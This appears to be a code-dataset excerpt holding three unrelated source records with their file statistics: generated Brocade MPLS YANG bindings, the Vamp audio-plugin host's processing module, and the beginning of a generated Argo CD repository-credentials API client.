self.__mpls_clear_statistics_transit_ldp_prefix_mask = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)
def _get_mpls_clear_statistics_transit_label_id(self):
"""
Getter method for mpls_clear_statistics_transit_label_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_label_id (uint32)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_transit_label_id
def _set_mpls_clear_statistics_transit_label_id(self, v, load=False):
"""
Setter method for mpls_clear_statistics_transit_label_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_label_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_transit_label_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_transit_label_id() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_transit_label_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_clear_statistics_transit_label_id = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_transit_label_id(self):
self.__mpls_clear_statistics_transit_label_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_clear_statistics_tunnel_ldp_id(self):
"""
Getter method for mpls_clear_statistics_tunnel_ldp_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_ldp_id (uint32)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_tunnel_ldp_id
def _set_mpls_clear_statistics_tunnel_ldp_id(self, v, load=False):
"""
Setter method for mpls_clear_statistics_tunnel_ldp_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_ldp_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_tunnel_ldp_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_tunnel_ldp_id() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_tunnel_ldp_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_clear_statistics_tunnel_ldp_id = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_tunnel_ldp_id(self):
self.__mpls_clear_statistics_tunnel_ldp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_clear_statistics_tunnel_rsvp_bypass(self):
"""
Getter method for mpls_clear_statistics_tunnel_rsvp_bypass, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_rsvp_bypass (uint8)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_tunnel_rsvp_bypass
def _set_mpls_clear_statistics_tunnel_rsvp_bypass(self, v, load=False):
"""
Setter method for mpls_clear_statistics_tunnel_rsvp_bypass, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_rsvp_bypass (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_tunnel_rsvp_bypass is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_tunnel_rsvp_bypass() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_tunnel_rsvp_bypass must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__mpls_clear_statistics_tunnel_rsvp_bypass = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_tunnel_rsvp_bypass(self):
self.__mpls_clear_statistics_tunnel_rsvp_bypass = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_mpls_clear_statistics_tunnel_name(self):
"""
Getter method for mpls_clear_statistics_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_name (string)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_tunnel_name
def _set_mpls_clear_statistics_tunnel_name(self, v, load=False):
"""
Setter method for mpls_clear_statistics_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_tunnel_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_tunnel_name() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_tunnel_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_clear_statistics_tunnel_name = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_tunnel_name(self):
self.__mpls_clear_statistics_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_clear_statistics_tunnel_dest(self):
"""
Getter method for mpls_clear_statistics_tunnel_dest, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_dest (mpls-ipv4-address)
YANG Description: Tunnel ID to be cleared
"""
return self.__mpls_clear_statistics_tunnel_dest
def _set_mpls_clear_statistics_tunnel_dest(self, v, load=False):
"""
Setter method for mpls_clear_statistics_tunnel_dest, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_dest (mpls-ipv4-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_clear_statistics_tunnel_dest is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_clear_statistics_tunnel_dest() directly.
YANG Description: Tunnel ID to be cleared
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_clear_statistics_tunnel_dest must be of a type compatible with mpls-ipv4-address""",
'defined-type': "brocade-mpls:mpls-ipv4-address",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)""",
})
self.__mpls_clear_statistics_tunnel_dest = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_clear_statistics_tunnel_dest(self):
self.__mpls_clear_statistics_tunnel_dest = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
mpls_clear_statistics_type = __builtin__.property(_get_mpls_clear_statistics_type, _set_mpls_clear_statistics_type)
mpls_clear_statistics_transit_ldp_fec_prefix = __builtin__.property(_get_mpls_clear_statistics_transit_ldp_fec_prefix, _set_mpls_clear_statistics_transit_ldp_fec_prefix)
mpls_clear_statistics_transit_ldp_prefix_address = __builtin__.property(_get_mpls_clear_statistics_transit_ldp_prefix_address, _set_mpls_clear_statistics_transit_ldp_prefix_address)
mpls_clear_statistics_transit_ldp_prefix_mask = __builtin__.property(_get_mpls_clear_statistics_transit_ldp_prefix_mask, _set_mpls_clear_statistics_transit_ldp_prefix_mask)
mpls_clear_statistics_transit_label_id = __builtin__.property(_get_mpls_clear_statistics_transit_label_id, _set_mpls_clear_statistics_transit_label_id)
mpls_clear_statistics_tunnel_ldp_id = __builtin__.property(_get_mpls_clear_statistics_tunnel_ldp_id, _set_mpls_clear_statistics_tunnel_ldp_id)
mpls_clear_statistics_tunnel_rsvp_bypass = __builtin__.property(_get_mpls_clear_statistics_tunnel_rsvp_bypass, _set_mpls_clear_statistics_tunnel_rsvp_bypass)
mpls_clear_statistics_tunnel_name = __builtin__.property(_get_mpls_clear_statistics_tunnel_name, _set_mpls_clear_statistics_tunnel_name)
mpls_clear_statistics_tunnel_dest = __builtin__.property(_get_mpls_clear_statistics_tunnel_dest, _set_mpls_clear_statistics_tunnel_dest)
_pyangbind_elements = {'mpls_clear_statistics_type': mpls_clear_statistics_type, 'mpls_clear_statistics_transit_ldp_fec_prefix': mpls_clear_statistics_transit_ldp_fec_prefix, 'mpls_clear_statistics_transit_ldp_prefix_address': mpls_clear_statistics_transit_ldp_prefix_address, 'mpls_clear_statistics_transit_ldp_prefix_mask': mpls_clear_statistics_transit_ldp_prefix_mask, 'mpls_clear_statistics_transit_label_id': mpls_clear_statistics_transit_label_id, 'mpls_clear_statistics_tunnel_ldp_id': mpls_clear_statistics_tunnel_ldp_id, 'mpls_clear_statistics_tunnel_rsvp_bypass': mpls_clear_statistics_tunnel_rsvp_bypass, 'mpls_clear_statistics_tunnel_name': mpls_clear_statistics_tunnel_name, 'mpls_clear_statistics_tunnel_dest': mpls_clear_statistics_tunnel_dest, }
| 85.161731
| 764
| 0.759857
| 5,610
| 37,386
| 4.740463
| 0.034581
| 0.085282
| 0.180041
| 0.109498
| 0.940663
| 0.927089
| 0.91201
| 0.886478
| 0.87234
| 0.861435
| 0
| 0.028597
| 0.100198
| 37,386
| 438
| 765
| 85.356164
| 0.76195
| 0.184989
| 0
| 0.46371
| 0
| 0.084677
| 0.405267
| 0.315923
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120968
| false
| 0.052419
| 0.032258
| 0
| 0.270161
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
745ea72fdab6d4d46b5a6c0e71e3ff57d0c42227
| 11,643
|
py
|
Python
|
lib/python2.7/site-packages/vamp/process.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 16
|
2016-11-19T07:24:54.000Z
|
2021-07-09T23:30:48.000Z
|
lib/python2.7/site-packages/vamp/process.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6
|
2017-04-05T12:00:38.000Z
|
2022-01-13T17:51:34.000Z
|
lib/python2.7/site-packages/vamp/process.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 1
|
2017-04-03T16:33:51.000Z
|
2017-04-03T16:33:51.000Z
|
#!/usr/bin/env python
# Python Vamp Host
# Copyright (c) 2008-2015 Queen Mary, University of London
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the names of the Centre for
# Digital Music and Queen Mary, University of London shall not be
# used in advertising or otherwise to promote the sale, use or other
# dealings in this Software without prior written authorization.
'''A high-level interface to the vampyhost extension module, for quickly and easily running Vamp audio analysis plugins on audio files and buffers.'''
import vampyhost
import vamp.frames
import vamp.load
def process_with_initialised_plugin(ff, sample_rate, step_size, plugin, outputs):
out_indices = dict([(id, plugin.get_output(id)["output_index"])
for id in outputs])
plugin.reset()
fi = 0
for f in ff:
timestamp = vampyhost.frame_to_realtime(fi, sample_rate)
results = plugin.process_block(f, timestamp)
# results is a dict mapping output number -> list of feature dicts
for o in outputs:
ix = out_indices[o]
if ix in results:
for r in results[ix]:
yield { o: r }
fi = fi + step_size
results = plugin.get_remaining_features()
for o in outputs:
ix = out_indices[o]
if ix in results:
for r in results[ix]:
yield { o: r }
def process_audio(data, sample_rate, plugin_key, output = "", parameters = {}, **kwargs):
"""Process audio data with a Vamp plugin, and make the results from a
single plugin output available as a generator.
The provided data should be a 1- or 2-dimensional list or NumPy
array of floats. If it is 2-dimensional, the first dimension is
taken to be the channel count.
The returned results will be those calculated by the plugin with
the given key and returned through its output with the given
output identifier. If the requested output is the empty string,
the first output provided by the plugin will be used.
If the parameters dict is non-empty, the plugin will be configured
by setting its parameters according to the (string) key and
(float) value data found in the dict.
This function acts as a generator, yielding a sequence of result
features as it obtains them. Each feature is represented as a
dictionary containing, optionally, timestamp and duration
(RealTime objects), label (string), and a 1-dimensional array of
float values.
If you wish to override the step size, block size, or process
timestamp method to be used, you may supply them as keyword
arguments with keywords step_size (int), block_size (int), and
process_timestamp_method (choose from vamp.vampyhost.SHIFT_DATA,
vamp.vampyhost.SHIFT_TIMESTAMP, or vamp.vampyhost.NO_SHIFT).
If you would prefer to obtain all features in a single output
structure, consider using vamp.collect() instead.
"""
plugin, step_size, block_size = vamp.load.load_and_configure(data, sample_rate, plugin_key, parameters, **kwargs)
if output == "":
output = plugin.get_output(0)["identifier"]
ff = vamp.frames.frames_from_array(data, step_size, block_size)
for r in process_with_initialised_plugin(ff, sample_rate, step_size, plugin, [output]):
yield r[output]
plugin.unload()
def process_frames(ff, sample_rate, step_size, plugin_key, output = "", parameters = {}):
"""Process audio data with a Vamp plugin, and make the results from a
single plugin output available as a generator.
The provided data should be an enumerable sequence of time-domain
audio frames, of which each frame is 2-dimensional list or NumPy
array of floats. The first dimension is taken to be the channel
count, and the second dimension the frame or block size. The
step_size argument gives the increment in audio samples from one
frame to the next. Each frame must have the same size.
The returned results will be those calculated by the plugin with
the given key and returned through its output with the given
output identifier. If the requested output is the empty string,
the first output provided by the plugin will be used.
If the parameters dict is non-empty, the plugin will be configured
by setting its parameters according to the (string) key and
(float) value data found in the dict.
This function acts as a generator, yielding a sequence of result
features as it obtains them. Each feature is represented as a
dictionary containing, optionally, timestamp and duration
(RealTime objects), label (string), and a 1-dimensional array of
float values.
If you would prefer to obtain all features in a single output
structure, consider using vamp.collect() instead.
"""
plugin = vampyhost.load_plugin(plugin_key, sample_rate,
vampyhost.ADAPT_INPUT_DOMAIN +
vampyhost.ADAPT_BUFFER_SIZE +
vampyhost.ADAPT_CHANNEL_COUNT)
fi = 0
channels = 0
block_size = 0
if output == "":
out_index = 0
else:
out_index = plugin.get_output(output)["output_index"]
for f in ff:
if fi == 0:
channels = f.shape[0]
block_size = f.shape[1]
plugin.set_parameter_values(parameters)
if not plugin.initialise(channels, step_size, block_size):
raise "Failed to initialise plugin"
timestamp = vampyhost.frame_to_realtime(fi, sample_rate)
results = plugin.process_block(f, timestamp)
# results is a dict mapping output number -> list of feature dicts
if out_index in results:
for r in results[out_index]:
yield r
fi = fi + step_size
if fi > 0:
results = plugin.get_remaining_features()
if out_index in results:
for r in results[out_index]:
yield r
plugin.unload()
def process_audio_multiple_outputs(data, sample_rate, plugin_key, outputs, parameters = {}, **kwargs):
"""Process audio data with a Vamp plugin, and make the results from a
set of plugin outputs available as a generator.
The provided data should be a 1- or 2-dimensional list or NumPy
array of floats. If it is 2-dimensional, the first dimension is
taken to be the channel count.
The returned results will be those calculated by the plugin with
the given key and returned through its outputs whose identifiers
are given in the outputs argument.
If the parameters dict is non-empty, the plugin will be configured
by setting its parameters according to the (string) key and
(float) value data found in the dict.
This function acts as a generator, yielding a sequence of result
feature sets as it obtains them. Each feature set is a dictionary
mapping from output identifier to a list of features, each
represented as a dictionary containing, optionally, timestamp and
duration (RealTime objects), label (string), and a 1-dimensional
array of float values.
If you wish to override the step size, block size, or process
timestamp method to be used, you may supply them as keyword
arguments with keywords step_size (int), block_size (int), and
process_timestamp_method (choose from vamp.vampyhost.SHIFT_DATA,
vamp.vampyhost.SHIFT_TIMESTAMP, or vamp.vampyhost.NO_SHIFT).
"""
plugin, step_size, block_size = vamp.load.load_and_configure(data, sample_rate, plugin_key, parameters, **kwargs)
ff = vamp.frames.frames_from_array(data, step_size, block_size)
for r in process_with_initialised_plugin(ff, sample_rate, step_size, plugin, outputs):
yield r
plugin.unload()
def process_frames_multiple_outputs(ff, sample_rate, step_size, plugin_key, outputs, parameters = {}):
"""Process audio data with a Vamp plugin, and make the results from a
set of plugin outputs available as a generator.
The provided data should be an enumerable sequence of time-domain
audio frames, of which each frame is 2-dimensional list or NumPy
array of floats. The first dimension is taken to be the channel
count, and the second dimension the frame or block size. The
step_size argument gives the increment in audio samples from one
frame to the next. Each frame must have the same size.
The returned results will be those calculated by the plugin with
the given key and returned through its outputs whose identifiers
are given in the outputs argument.
If the parameters dict is non-empty, the plugin will be configured
by setting its parameters according to the (string) key and
(float) value data found in the dict.
This function acts as a generator, yielding a sequence of result
feature sets as it obtains them. Each feature set is a dictionary
mapping from output identifier to a list of features, each
represented as a dictionary containing, optionally, timestamp and
duration (RealTime objects), label (string), and a 1-dimensional
array of float values.
"""
plugin = vampyhost.load_plugin(plugin_key, sample_rate,
vampyhost.ADAPT_INPUT_DOMAIN +
vampyhost.ADAPT_BUFFER_SIZE +
vampyhost.ADAPT_CHANNEL_COUNT)
out_indices = dict([(id, plugin.get_output(id)["output_index"])
for id in outputs])
fi = 0
channels = 0
block_size = 0
for f in ff:
if fi == 0:
channels = f.shape[0]
block_size = f.shape[1]
plugin.set_parameter_values(parameters)
if not plugin.initialise(channels, step_size, block_size):
raise "Failed to initialise plugin"
timestamp = vampyhost.frame_to_realtime(fi, sample_rate)
results = plugin.process_block(f, timestamp)
# results is a dict mapping output number -> list of feature dicts
for o in outputs:
ix = out_indices[o]
if ix in results:
for r in results[ix]:
yield { o: r }
fi = fi + step_size
if fi > 0:
results = plugin.get_remaining_features()
for o in outputs:
ix = out_indices[o]
if ix in results:
for r in results[ix]:
yield { o: r }
plugin.unload()
| 40.70979
| 150
| 0.68436
| 1,665
| 11,643
| 4.702102
| 0.166967
| 0.020437
| 0.006131
| 0.017371
| 0.822966
| 0.799591
| 0.793205
| 0.780176
| 0.780176
| 0.780176
| 0
| 0.004288
| 0.258954
| 11,643
| 285
| 151
| 40.852632
| 0.903106
| 0.586017
| 0
| 0.841584
| 0
| 0
| 0.022691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049505
| false
| 0
| 0.029703
| 0
| 0.079208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
748f068a135278e831234a35a28fc4cf64b603f1
| 21,707
|
py
|
Python
|
argocd_client/api/repo_creds_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2021-09-29T11:57:07.000Z
|
2021-09-29T11:57:07.000Z
|
argocd_client/api/repo_creds_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2020-09-09T00:28:57.000Z
|
2020-09-09T00:28:57.000Z
|
argocd_client/api/repo_creds_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 2
|
2020-10-13T18:31:59.000Z
|
2021-02-15T12:52:33.000Z
|
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from argocd_client.api_client import ApiClient
from argocd_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class RepoCredsServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_repository_credentials(self, body, **kwargs): # noqa: E501
"""CreateRepositoryCredentials creates a new repository credential set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_repository_credentials(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param V1alpha1RepoCreds body: Repository definition (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1RepoCreds
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_repository_credentials_with_http_info(body, **kwargs) # noqa: E501
def create_repository_credentials_with_http_info(self, body, **kwargs): # noqa: E501
"""CreateRepositoryCredentials creates a new repository credential set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_repository_credentials_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param V1alpha1RepoCreds body: Repository definition (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1RepoCreds, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_repository_credentials" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_repository_credentials`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
